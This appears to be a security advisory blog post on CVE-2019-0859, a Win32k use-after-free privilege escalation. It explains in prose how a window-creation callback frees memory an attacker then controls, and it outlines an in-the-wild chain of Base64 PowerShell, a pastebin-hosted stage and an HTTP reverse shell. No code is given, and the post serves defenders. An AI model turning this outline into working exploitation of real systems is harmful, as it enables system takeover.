While we all breathed a sigh of relief after patching our systems against the two zero-days reported in the April Patch Tuesday, news broke out that one of them was actively exploited in the wild and could allow an attacker to completely compromise your system. This is another case of win32k.sys in jeopardy.
This vulnerability, assigned with CVE-2019-0859, was reported by Vasiliy Berdnikov and Boris Larin of the Kaspersky Labs. This is an elevation of privilege vulnerability caused due to improper handling of objects in the memory by Win32k component. Successful exploitation allows an attacker to run arbitrary code in kernel mode. This could be further used to view, change, or delete data, install programs or create new accounts with full user rights. Consequentially, backdoors which connect back the attackers can be established on vulnerable systems.
Researchers believe that this vulnerability has been a new addition in the campaigns carried out by APT groups such as SandCat and FruityArmor.
In order to exploit this vulnerability, an attacker would first have to be logged on to the system. He can then gain elevated privileges step by step. Two points help better understand this use-after free vulnerability
- Function ID: The windows in win32k.sys kernel have a tagWND structure with a Function ID called the ‘fnid‘ field. The classes of a window such as ScrollBar, Menu, Desktop, etc are defined using this field.
- Creation of windows: Execution of CreateWindowEx function sends a WM_NCCREATE message for creation of a Window prior to WM_CREATE message. A custom callback can be set using the SetWindowsHookEx to handle the WM_NCCREATE message before calling the window procedure.
An attacker gains control of a freed memory block in the following way. The Function ID of a window is set to 0 during the WM_NCCREATE callback which allows an attacker to set extra data for the window. Also, the address for the window procedure can be changed. The window procedure next changes to the menu window procedure executing xxxMenuWindowProc and setting the Function ID to FNID_MENU. But, the extra data can be manipulated prior to setting Function ID. This can force stop the xxxMenuWindowProc function from initializing a menu and return FALSE. At this juncture, sending the NCCREATE message is considered as a failure and CreateWindowEx function stops execution with a call to FreeWindow. As a result, an address memory block is freed and an attacker can gain control over this.
An attacker who can now execute arbitrary code in kernel mode, runs a malicious file using the PowerShell framework with a Base64 encoded command. Execution of the command leads to the download of a second-stage script from https//pastebin.com. This script in turn executes the third stage PowerShell script. Finally, a trivial HTTP reverse shell is created to gain full control of the system.
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
Windows Server 2019
CVE-2019-0859 is an elevation of privilege vulnerability allowing an attacker to run arbitrary code in kernel mode. This permits an attacker to take control of an entire system.
Please refer this KB article.